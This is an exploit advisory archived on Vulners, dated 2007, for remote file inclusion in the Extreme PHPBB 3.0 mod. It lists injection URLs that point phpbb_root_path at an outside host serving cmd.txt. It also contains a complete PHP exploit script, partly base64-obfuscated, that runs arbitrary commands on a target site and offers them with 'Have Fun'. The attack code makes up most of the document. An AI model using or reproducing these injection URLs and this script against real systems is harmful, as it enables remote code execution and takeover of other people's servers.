Vulners
Lucene search
extreme-rfi.txt
`
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]
Tested on 3.0 Pre Final And other Versions Should be infected
/* Script info
## Mod Title: Extreme PHPBB 3.0
## Mod Version: 3.0 Pre Final
## Author: danb00 (Demo: http://extremephpbb.com/forum)
## Description: A fully modded phpBB 2.0.11
*/
Remote File include :-
includes/functions.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?
includes/functions_portal.php?phpbb_root_path=http://psevil.googlepages.com/cmd.txt?
Exploit:
<?php
/***********************************************/
/* Extreme PHPBB2 Command Execution Exploit */
/* By : HACKERS PAL <[email protected]> */
/* Website : WwW.SoQoR.NeT */
/***********************************************/
error_reporting(0);
ini_set("max_execution_time",0);
Function get_page($url){if(function_exists("file_get_contents")){$contents=file_get_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024)){$contents=$contents.$line;}}return$contents;}
Echo "<body bgcolor=\"#000000\" text=\"#00FF00\">\n<title>Extreme PHPBB2 Command Execution Exploit by : HACKERS PAL :: WwW.SoQoR.NeT ::</title>\n\r"."<h2>Extreme PHPBB2 Command Execution\n\r"."<h3>By : HACKERS PAL [[email protected]]\n\r"."<h3>VisiT My Website [<a href=\"http://WwW.SoQoR.NeT\">WwW.SoQoR.NeT</a>]\n\r";
$expl=base64_decode("aW5jbHVkZXMvZnVuY3Rpb25zLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZXZpbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=");
$action=$_GET['action'];
if($action == "")
{
echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n Web URL -- Example : http://localhost/Extreme\n <br> <input type=\"text\" name=\"url\" style=\"width:250\">\n <br> <br>\n Command : <br> <textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n <br>\n <br> <div align=\"center\">\n <input type=\"submit\"> </div>\n </form>\n ";
}
else
{
$exploit=$_POST['url']."/".$expl."&cmd=".$_POST['query'];
$page=get_page($exploit);
if(!eregi("hacking attempt",$page))
{
Echo "<h1> Command Successfully executed .. Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>";
}
}
die(base64_decode("PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjoKPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5ldmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5oQTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5saSA8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+eDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGU
iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj4xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZXQgLAo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bGFjawo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk08L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5uPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Zm9u
dCBjb2xvcj0iI0ZGMDAwMCI+SjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPnJlPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4KQjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmE8L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5naDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmRhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5EPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIj4KLCA8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkQ8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnIgPC9mb250Pgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+Y2s8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnI8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPgosPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+PGJyPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5TPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cDwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+ZWM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pYTwvZ
m9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+bCBHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPkY8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vciA6CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5RPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPi48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5UPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPlQ8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lYTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+TTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RDwvZm9udD
48Zm9udCBjb2xvcj0id2hpdGUiPgo8L2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5NPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+bWI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lcjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UzwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjsKPC9mb250Pgo8L2I+Cjxicj48YnI+CjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiIGhyZWY9Im1haWx0bzpzZWN1cml0eUBzb3Fvci5uZXQiPgo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+QzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+dTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+aTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+eTwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0FUXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UTw
vZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+bzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+UjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0RvVF08L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPlQ8L2ZvbnQ+PC9hPgo8YnI+CjxhIGhyZWY9Imh0dHA6Ly93d3cuc29xb3IubmV0IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnc8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiIGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPltEb1RdPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5TPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5RPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmYWNl
PSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5SPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5bRG9UXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+TjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+VDwvZm9udD48L2E+CjwvZGl2Pgo8L2JvZHk+"));
?>
#WwW.SoQoR.NeT
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2007 00:00Current
7.4High risk
Vulners AI Score7.4